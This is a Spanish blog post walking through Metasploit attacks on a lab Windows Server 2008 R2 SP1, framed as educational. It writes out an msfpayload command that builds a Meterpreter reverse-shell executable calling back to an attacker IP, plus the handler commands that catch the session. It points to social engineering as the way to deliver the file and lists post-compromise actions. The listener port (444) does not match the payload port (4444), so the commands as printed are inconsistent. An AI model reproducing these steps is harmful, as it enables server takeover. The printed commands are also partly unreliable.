Metasploit en Windows Server 2008 R2 SP1

Gracias a C0lds0ft tendremos en el blog una serie de entradas con la que se pretende demostrar varias técnicas de Hacking con Metasploit en Windows Server 2008 R2 SP1.


Shell Reversa

Este primer video contiene una técnica conocida llamada conexión en reversa (shell reverse), realizado mediante la generación de un archivo ejecutable con la herramienta msfpayload.
En esta demostración con fines educativos se observa un Windows Server 2008 R2 SP1 con IP 192.168.1.39 corriendo sobre un entorno virtualizado del servicio Hyper-V Virtualization y la conexión al equipo atacante mediante Putty (192.168.1.254) donde previamente se construye el archivo .exe, llamado C0lds0ft.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=4444 X >/root/Escritorio/C0lds0ft.exe

Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. 

Posterior a enviado se procede a poner a la escucha así: 

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.254
set LPORT 444
exploit
   
De esta manera cuando la víctima ejecuta el archivo .exe nos da una conexión Meterpreter en reversa, obteniendo total acceso a la maquina. Con esta conexión podría el administrador perder el control del servidor, puesto que entre otras se puede crear usuarios, activar escritorio remoto, descargar archivos, subir archivos, publicar páginas web, modificar IIS, crear DDOS, Phishing, etc.

 

Archivo .PDF Malicioso

En esta parte se mostrara la forma de generar una shell en reversa mediante el envenenamiento de un archivo PDF sobre windows server 2008.  El procedimiento se realiza como se evidencia en los siguientes vídeos.

Primera Parte


Segunda Parte